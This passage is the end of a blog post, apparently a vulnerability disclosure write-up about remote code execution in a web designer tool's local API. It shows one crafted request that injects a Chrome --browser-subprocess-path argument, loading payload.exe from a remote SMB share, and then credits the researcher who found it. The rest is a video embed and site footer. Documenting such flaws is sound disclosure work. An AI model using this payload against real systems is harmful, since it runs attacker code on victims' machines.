<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//ninja-shell/api/browser?method=open&amp;usedefaultapp=false&amp;browser=chrome&amp;url=//%22%20--browser-subprocess-path%3D%5C%5Cbalintmagyar.com%5Cpayload.exe%20--headless%20%22
</code></pre></div></div>

<p>You can notice the similarities the path endpoint is same, only difference is in the parameters which I totally failed to find about during my esalation this involves arguement injection in the chrome process + using SMB share to deliver the executable , so props to Bálint on finding this 🫡</p>

<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/494MSLeW7n8?si=l9HtKiizcn6Y2LQU" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>
</center>
<p><br />
<br /></p>

  </div><a class="u-url" href="/2025/09/23/RCE-in-web-designer.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="http://localhost:4000/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
        <ul class="contact-list">
          <li class="p-name">sudi</li>
          <li><a class="u-email" href="mailto:sudi[at]wearehackerone.com">sudi[at]wearehackerone.com</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <p>Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.
</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"></ul>
</div>

  </div>

</footer>
</body>

</html>
